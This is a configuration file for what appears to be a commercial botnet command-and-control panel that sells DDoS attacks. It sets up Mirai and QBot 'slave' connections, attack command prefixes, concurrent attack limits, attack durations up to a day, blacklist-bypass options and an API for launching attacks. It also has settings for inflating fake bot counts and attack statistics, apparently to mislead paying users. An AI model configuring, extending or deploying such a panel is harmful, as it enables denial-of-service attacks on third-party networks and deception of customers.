wait-on-exit=true
time-wait-on-exit=5s
# Time in seconds
custom-bin-command-timeout=25

min-password-length=3
# Colour scheme
theme-primary=[37m
theme-secondary=[0m
theme-cmd-input=[38;2;184;52;92;48;2;0;0;0m
theme-value-input=[93m
theme-highlight=[38;2;184;52;92;48;2;20;0;0m
theme-terminate=[0m

preference-loc=6d5023d14bae72a8481ea8f18b306a783b99357d
#This is only required if you are using Mirai
#0,0,0 is the default and should not be changed
mirai-slave-connect-banner=0,0,0
mirai-slave-source-max-len=70
#Allows you to determine what to do with a Mirai client which does not conform to the connection banner
#Settings the connection banner up wrong will result in slave names not showing but can also result in
#the slave being kick when strict equals true
mirai-slave-connect-banner-strict=false

qbot-attack-prefix=!* 
qbot-attack-suffix=[37m\n
qbot-ping-sleep=3000
qbot-ping-enabled=true
qbot-ping-request=PING[37m\n
# DLC options
# Here is where you would modify any settings relating to a DLC
# Each DLC will be located under its respected name, making it easy to find

## Import & Export DLC options
import-export-api=true
import-export-http=true
import-export-domain=localhost
import-export-host=:8080
#If http is set to true then the tls options do not need to be set
import-export-tls-cert=./assets/api.crt
import-export-tls-key=./assets/api.pem
# API Auth
# Hash; sha256, sha512
import-export-auth-hash=sha256
import-export-api-default-time=200
# 1 concurrents means only 1 attack at a time
import-export-api-default-conncurrents=1
import-export-api-default-vip=false
import-export-api-default-bypass-blacklist=false
import-export-api-default-cool-down=100s
# System allows the API client to access internal endpoints and manipulate how Slovakia works
# Example would be sending an RAW payload to all slaves or accessing all online users
import-export-api-default-system=false
import-export-api-min-name-len=5
import-export-api-validate-ip=true

import-export-webhook-username=Alerts


fakeslave-count=false
fakeslave-count-equilibrium-high=1392
fakeslave-count-equilibrium=1143
fakeslave-count-factor-attacks=true
fakeslave-count-jump-point=1120

fake-slaves-add=0

api-edition-no-slots-crib=YOU HAVE REACHED MAX CONCURRENTS
api-edition-no-slots-message=Sorry there is currently no open slots for your attack.

newuser-force-password-change=true
force-mfa-all-users=false

# Prevents attacks to the same target if one already exists from any user
powersaving-enabled=true

# Convert method case will convert the attack method to (1 = lower case) or (2 = upper case) when sending the attack
# Please note attack names in the attacks.json and api-attacks.json must be lower case!
# Usually when hooking up qbot's you must set this to upper case
convert-method-case=1


# API edition
# 80 seconds timeout for sending a attack to the API
# A lot of APIs are super slow so we need to increase the timeout to handle it
api-send-timeout=80
api-request-method=GET

# Background launch will send the attack instantly without any wait time but will result in no error checking if the attack was a success of not
api-background-launch=false

# Attacks table max target display length
attack-table-max-display-length=15
attack-table-rows-limit=400

# myattacks command max target name. PCRM DLC
myattack-table-max-display-length=24
attack-log-table-max-display-length=24

# DO NOT MODIFY THIS UNLESS YOU KNOW WHAT YOU ARE DOING!
# This increasing the width from 120 and height to 2 when using multi lined prompts may benefit from enabling this.
# Please note this has a high risk of screwing up your prompts! But this is not permanent, just switch this to false.
# When enabling and setting options run reload to see instant changes. If you set cmd-input-size-modifier to false after being on a full user relog is required.
cmd-input-size-modifer=false
cmd-input-width=321
cmd-input-height=2



# This option is only available in Cry Edition and the Spinner DLC. Contact sales if you are interested in unlocking.
title-spinner-charset=[-],[/],[|],[\]
title-spinner-split=,
spinner-enabled=true
# Location left or right
spinner-location=right

# How frequently the title updates in ms. 1,000 ms is recommended.
title-update=1000

#Make sure this UDP port is blocked from the outside but it MUST be allowed on the loopback
slave-propagation-enabled=false
slave-propagation-port=3493


# Moderation & Management DLC ongoing attacks command options
ongoing-first-party-only=false

# Hollywood Glamour DLC
# Gradients on your commands

#Start and end are RGB values
hollywood-glamour-enabled=true
hollywood-glamour-start=0,140,100
hollywood-glamour-end=184,52,92

hollywood-glamour-session-view-applied=false
hollywood-glamour-pcrm-dashboard-applied=true
hollywood-glamour-credits-applied=true
hollywood-glamour-modmange-ongoing-applied=true
hollywood-glamour-modmange-presets-applied=true
hollywood-glamour-modmange-kicks-applied=true
hollywood-glamour-users-view-applied=false

# Online users delta
fake-online-masters-delta=0
fake-running-attacks-delta=0
fake-total-attacks-delta=0

# The max time is the maximum time a users plan can be set in seconds
hard-max-time=86400